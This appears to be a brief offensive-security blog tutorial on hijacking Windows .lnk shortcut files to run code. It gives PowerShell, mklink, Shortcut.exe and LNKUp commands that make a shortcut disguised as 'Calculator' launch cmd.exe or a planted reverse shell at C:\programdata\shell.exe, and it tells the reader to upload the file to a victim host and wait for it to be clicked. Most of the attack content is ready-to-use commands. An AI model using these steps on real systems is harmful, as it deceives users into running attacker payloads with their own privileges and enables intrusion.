.lnk Command Execution

2 minute read

In this post we’ll be covering the different ways we can create, edit, and abuse Windows .lnk files to achieve command exection.

.lnk files are shortcuts or links used within a Windows environment to start the software installed on your computer.

PowerShell


The following commands will create a .lnk file to the Windows Calculator program located at c:\Windows\System32\calc.exe

$WScript = New-Object -COM WScript.shell
$SC = $WScript.CreateShortcut('C:\Users\New\Desktop\Calulator.lnk')
$SC.TargetPath="C:\Windows\System32\calc.exe"

$SC             //check everything is correct      

FullName         : C:\users\new\desktop\Calulator.lnk
Arguments        :
Description      :
Hotkey           :
IconLocation     : ,0
RelativePath     :
TargetPath       : C:\Windows\System32\calc.exe
WindowStyle      : 1
WorkingDirectory :

$SC.Save() 

Double clicking the link launches the calculator, shown below:


We want to hijack the execution path so that when the link is clicked it runs a program of our choosing, instead of c:\windows\system32\calc.exe.

Right-click the link and select properties, the following window will pop up:


Change the Target: and Start in: fields to the following:

Target: C:\Windows\System32\cmd.exe /c C:\Windows\System32\cmd.exe
Start in: C:\Windows\System32


Click Apply, then OK to save the changes.

Our Calculator.lnk file will now launch cmd.exe instead of calc.exe, with the same privileges as the user that clicked upon it. You’ll see that when we now click on the link, a command prompt is spawned instead of the calculator:


This means that we’re able to change what is executed by the victim, upon click. With this in mind we can effectively run any program we want with the same privileges of the victim user (dependent upon their own assigned privileges).

Our best bet would be to execute an exe or ps1 reverse shell.

$WScript = New-Object -COM WScript.shell
$SC = $WScript.CreateShortcut('Calculator.lnk')
$SC.TargetPath="C:\Windows\System32\cmd.exe"
$SC.Arguments="/c C:\programdata\shell.exe" 
$SC          //check everything is correct        
$SC.Save() 

The $SC.Arguments value will be executed on the target host, be sure to have your shell in place.


PowerShell One-Liner


The following command can also be used to generate a .lnk file that executes a program of our choosing.

New-Item -ItemType SymbolicLink -Path C:\users\new\desktop\ -Name Calculator.lnk -Value C:\Windows\System32\cmd.exe

This command has to be run with admin privs. Start a command prompt as admin on your local machine, and use the properties method mentioned earlier to change the target executable to that of your choosing.


The mklink utility simple creates a symbolic link between two objects:

mklink Calculator.lnk C:\windows\System32\cmd.exe 

This command has to be run with admin privs. Start a command prompt as admin on your local machine, and use the properties method mentioned earlier to change the target executable to that of your choosing.

Shortcut.exe


The Shortcut.exe utility is available on Windows 7, but not on Windows 10. It can still be used to create a link for the Calulator to a malicious exe uploaded on the victim host:

shortcut.exe /F:Calculator.lnk /A:C /T:C:\programdata\shell.exe

/F:filename	: Specifies the .LNK shortcut file.
/A:action	: Defines the action to take (C=Create, E=Edit or Q=Query).
/T:target	: Defines the target path and file name the shortcut points to.


LNKUp


Finally there’s a tool called LNKUp that automates the process for us:

python generate.py --host localhost --type ntlm --output Calculator.lnk --execute 'C:\programdata\shell.exe'

Simply upload the generated Calculator.lnk file and wait for its execution.


Conclusion


I used the Windows Calculator for the sake of example. Be sure to tailor your .lnk file for the specific situation at hand.